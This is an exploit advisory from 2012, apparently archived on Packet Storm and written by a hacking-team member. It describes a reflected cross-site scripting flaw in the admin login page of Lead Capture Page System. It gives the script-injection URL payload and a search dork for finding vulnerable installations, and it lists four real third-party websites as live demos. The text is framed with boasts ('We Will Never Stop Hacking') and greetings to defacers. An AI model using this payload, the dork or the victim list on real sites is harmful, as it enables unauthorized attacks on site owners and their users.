Lead Capture Page System suffers from a cross site scripting vulnerability.
ef9572480e65313504d854c94ff0fe50ec8cbaf54890d64e30bd0cf4a545429a=================================================================================
Web : ashiyane.org
e-mail : HashoR [DOT] BlackHat [AT] Gmail.Com
#########################################
I'm HashoR , member from ashiyane.org
-!We Love KurDestaN!-
#########################################
================================================================================
------|-------------------------------------------------------|------
####
# Exploit :Lead Capture Page System - Cross Site Scripting Vulnerability
# Date : 1/21/2012
# Vendor : http://leadcapturepagesystem.com
# Author : HashoR
# Team : Ashiyane Digital Security Team
# E-mail : HashoR [DOT] BackHat [AT] Gmail.Com
# Dork : intext:"Powered By Lead Capture Page System"
# Home : http://ashiyane.org/forums/
####
>>>
Explo!T :
in admin login ---> http://site/admin/login.php?message=<script>alert('Xss By HashoR')</script>
DeMo:
http://dftnews.com/admin/login.php?message=<script>alert('Xss By HashoR')</script>
http://goldengatetowealth.org/admin/login.php?message=<script>alert('Xss By HashoR')</script>
http://instantmoneynetwork.com/admin/login.php?message=<script>alert('Xss By HashoR')</script>
http://provensystem4success.com/admin/login.php?message=<script>alert('Xss By HashoR')</script>
>>>
[+] LoL.......
# By HashoR!
• We Will Never Stop Hacking
• Its not a game
• It's Our Job
enjoy!
||> Special Greeting To: All members in Ashiyane.org
||> Special Greeting To: All members in KurdHackTeaM
####
# 0wned B0X:
KurdHackTeaM - brwsk007 - SA3D HaCk3D
Behrooz_Ice - Q7x - Sha2ow - Virangar - Azazel - Ali_Eagle - keivan
taghva - elvator - mmilad200 - PrinceofHacking - iman_taktaz - ERroR
Black - Rz04 - ruin3r - Gladiator - unique2world - EroRR
M3QD4D - Http://Askn - Classic - n3me3iz - Zend - r3d.z0nE
HIDDEN-HUNTER - Hijacker - AliAkh - A.S.P.I.R.I.N - *Alexander* - Pr0grammer- HASSAN20- AR455
Greetz: hashor- ArmanSoftware - removal_load - B3HR0Z - @Master - Satanic2000 - N4H - angola
And All Ashiyane Defacers
------|-------------------------------------------------------|------
#D:: ___ ____ ____
#````______/```\__//```\__/____\
#``_/```\_/``:```````````//____\
#`/|``````:``:``..``````/ HashoR \
#|`|`````::`````::``````\````````/
#|`|`````:|`````||`````\`\______/
#|`|`````||`````||``````|\``/``|
#`\|`````||`````||``````|```/`|`\
#``|`````||`````||``````|``/`/_\`\
#``|`___`||`___`||``````|`/``/````\
#```\_-_/``\_-_/`|`____`|/__/``````\
#````````````````_\_--_/````\`````/
#```````````````/____```````````/
#``````````````/`````\`````````/
#``````````````\______\_______/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed